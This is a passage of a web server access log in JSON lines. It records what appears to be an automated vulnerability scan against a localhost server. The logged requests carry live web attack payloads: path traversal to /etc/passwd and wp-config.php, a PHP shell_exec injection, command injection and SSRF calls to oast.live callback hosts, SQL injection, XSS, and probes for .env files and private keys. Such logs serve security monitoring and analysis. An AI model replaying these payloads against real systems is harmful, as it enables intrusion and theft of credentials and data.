HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.471","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.321","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"x_login=../../../wp-config","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.647","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.464","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.502","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.483","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.411","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\x22","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.869","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://c9oms3gsmpve1ijt0mc0t3hpw41pi4d56.oast.live; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.575","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://c9oms3gsmpve1ijt0mc0pzjubcnerqoti.oast.live%23 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.463","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.480","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/default/view HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.465","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://c9oms3gsmpve1ijt0mc09667huf45aji7.oast.live&ProviderName=TheMovieDB HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.531","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.444","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.418","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.728","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.491","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.300","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.416","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.449","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.437","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.978","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/28fHqVHrQWXk5RX0PZpD4QuJgHl/)%3B%3C%2Fscript%3E%3C HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.260","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-zoomsounds/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.328","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.development.local HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", 